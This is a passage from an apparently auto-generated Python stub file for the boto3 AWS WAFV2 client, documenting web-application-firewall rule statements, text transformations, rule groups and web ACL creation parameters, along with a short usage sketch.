are likely to be malicious strings.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. 
This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nSizeConstraintStatement (dict) --A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.\nIf you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.\nIf you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. 
The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nComparisonOperator (string) -- [REQUIRED]The operator to use to compare the request part to the size setting.\n\nSize (integer) -- [REQUIRED]The size, in bytes, to compare to the request part, after any transformations.\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. 
HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nGeoMatchStatement (dict) --A rule statement used to identify web requests based on country of origin.\n\nCountryCodes (list) --An array of two-character country codes, for example, [ 'US', 'CN' ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.\n\n(string) --\n\n\n\n\nRuleGroupReferenceStatement (dict) --A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.\nYou cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the entity.\n\nExcludedRules (list) --The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\nIPSetReferenceStatement (dict) --A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .\nEach IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the IPSet that this statement references.\n\n\n\nRegexPatternSetReferenceStatement (dict) --A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .\nEach regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. 
When you update the referenced set, AWS WAF automatically updates all rules that reference it.\n\nARN (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters\n\n\nLOWERCASE\nUse this option to convert uppercase letters (A-Z) to lowercase (a-z).\n\nURL_DECODE\nUse this option to decode a URL-encoded value.\n\nNONE\nSpecify NONE if you don\'t want any text transformations.\n\n\n\n\n\n\n\nRateBasedStatement (dict) --A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.\nWhen the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.\nYou can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:\n\nAn IP match statement with an IP set that specified the address 192.0.2.44.\nA string match statement that searches in the User-Agent header for the string BadBot.\n\nIn this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.\nYou cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nLimit (integer) -- [REQUIRED]The limit on requests per 5-minute period for a single originating IP address. 
If the statement includes a ScopeDownStatement , this limit is applied only to the requests that match the statement.\n\nAggregateKeyType (string) -- [REQUIRED]Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.\n\nScopeDownStatement (dict) --An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.\n\n\n\nAndStatement (dict) --A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with AND logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nOrStatement (dict) --A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .\n\nStatements (list) -- [REQUIRED]The statements to combine with OR logic. You can use any statements that can be nested.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nThe processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.\n\n\n\n\n\nNotStatement (dict) --A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .\n\nStatement (dict) --The statement to negate. You can use any statement that can be nested.\n\n\n\nManagedRuleGroupStatement (dict) --A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .\nYou can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.\n\nVendorName (string) -- [REQUIRED]The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n\nName (string) -- [REQUIRED]The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n\nExcludedRules (list) --The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . 
This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type Tags: list
:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about a RuleGroup, returned by operations like create and list. This provides information like the ID, which you can use to retrieve and manage a RuleGroup, and the ARN, which you provide to the RuleGroupReferenceStatement to use the rule group in a Rule.
Name (string) --
The name of the data type instance. You cannot change the name after you create the instance.
Id (string) --
A unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
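# Hedged usage sketch (not part of the generated stubs): one way to call
# create_rule_group through a real boto3 client and consume the Summary
# documented above. The rule group name, the Capacity estimate, and the
# metric name are illustrative assumptions, not values taken from this file.
def _example_create_rule_group():
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    response = client.create_rule_group(
        Name='example-rule-group',        # assumed name
        Scope='REGIONAL',
        Capacity=100,                     # assumed web ACL capacity unit estimate
        VisibilityConfig={
            'SampledRequestsEnabled': True,
            'CloudWatchMetricsEnabled': True,
            'MetricName': 'exampleRuleGroup',   # assumed metric name
        },
    )
    summary = response['Summary']
    # The ARN is what you pass to a RuleGroupReferenceStatement in a web ACL rule;
    # the LockToken is needed for later update and delete calls.
    return summary['ARN'], summary['LockToken']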
def create_web_acl(Name=None, Scope=None, DefaultAction=None, Description=None, Rules=None, VisibilityConfig=None, Tags=None):
"""
Creates a WebACL per the specifications provided.
A Web ACL defines a collection of rules to use to inspect and control web requests. Each rule has an action defined (allow, block, or count) for requests that match the statement of the rule. In the Web ACL, you assign a default action to take (allow, block) for any request that does not match any of the rules. The rules in a Web ACL can be a combination of the types Rule , RuleGroup , and managed rule group. You can associate a Web ACL with one or more AWS resources to protect. The resources can be Amazon CloudFront, an Amazon API Gateway API, or an Application Load Balancer.
See also: AWS API Documentation
Exceptions
:example: response = client.create_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
DefaultAction={
'Block': {}
,
'Allow': {}
},
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
